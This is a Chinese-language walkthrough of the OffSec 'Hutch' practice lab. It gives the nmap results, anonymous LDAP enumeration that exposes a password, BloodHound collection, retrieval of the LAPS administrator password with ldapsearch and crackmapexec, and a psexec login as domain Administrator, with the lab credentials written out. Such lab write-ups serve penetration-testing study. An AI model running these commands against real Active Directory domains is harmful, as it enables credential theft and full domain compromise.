靶场（十七）---小白心得思路分析---Hutch

 启程：

这回东西很多，但是有用的消息就那么几条，53端口开放可能需要我们考虑DNS外部传输一类的，80则是要考虑可能存在什么服务搭载，88端口告诉我们正在托管kerberos服务，135、139、445则是告诉我们记得使用smbclient看一下有没有可以访问的公开目录，389、3268搭载着ldap服务这里我们需要使用lapsearch进行枚举，636、3269搭载着ldas服务，5895则是托管着winrm服务

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/10.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Server Date: Tue, 25 Mar 2025 07:20:08 GMT
|_  Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-25 07:19:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-03-25T07:20:11
|_  start_date: N/A
|_clock-skew: -1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

这里我们给出两条命令对ldap服务进行枚举，第一条命令为了确认base namingcontext，第二条命令是在得到base namingcontext之后对其进行匿名ldap搜索

ldapsearch -H ldap://192.168.55.122 -x -s base namingcontexts
ldapsearch -x -h 192.168.55.122 -b "dc=hutch,dc=offsec"

 执行第二条命令时候，我们得到一堆用户名，然后在这里我们翻到最后一条的时候，发现了一组票据，然后记录下来，用于后续的smb登录和winrm登录尝试

我们尝试了smb登录和winrm登录均失败，所以我们使用bloodhound整理一下我们当前用户具备哪些权限，然后这里我们使用bloodhound-python收集boodhound的json文件

/usr/bin/bloodhound-python --dns-tcp -ns 192.168.55.122 -d hutch.offsec -u 'fmcsorley' -p 'CrabSharkJellyfish192' -c all

 然后启动一下neo4j

将我们搞到的json文件，导入即可

在左上角选择最短路径即可看到我们当前用户具备读laps password的权限

然后我们使用本靶场最重要的命令，使用第一条命令检索laps密码，第二条命令也可以实现同样得结果，大家看着来就行

ldapsearch -v -c -D fmcsorley@hutch.offsec -w CrabSharkJellyfish192 -b "DC=hutch,DC=offsec" -H ldap://192.168.55.122 "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

crackmapexec ldap 192.168.219.122 -u fmcsorley -p CrabSharkJellyfish192 --kdcHost 192.168.55.122 -M laps

然后我们使用得到的管理员票据尝试登录，使用psexec成功登录域控的管理员账户

/usr/share/doc/python3-impacket/examples/psexec.py "HUTCH/Administrator@192.168.55.122"

总结：

靶场设置的还不错，可以很好的补充你的ldapsearch命令，顺道帮你巩固了一下bloodhound使用，提权的方式也是很新奇的，至于其他的枚举命令我重启靶机的时候都没了，就没带记录，需要枚举命令的可以私信我

有效链接：

SpecterOps/BloodHound：六度域管理员 --- SpecterOps/BloodHound: Six Degrees of Domain Adminhttps://github.com/SpecterOps/BloodHound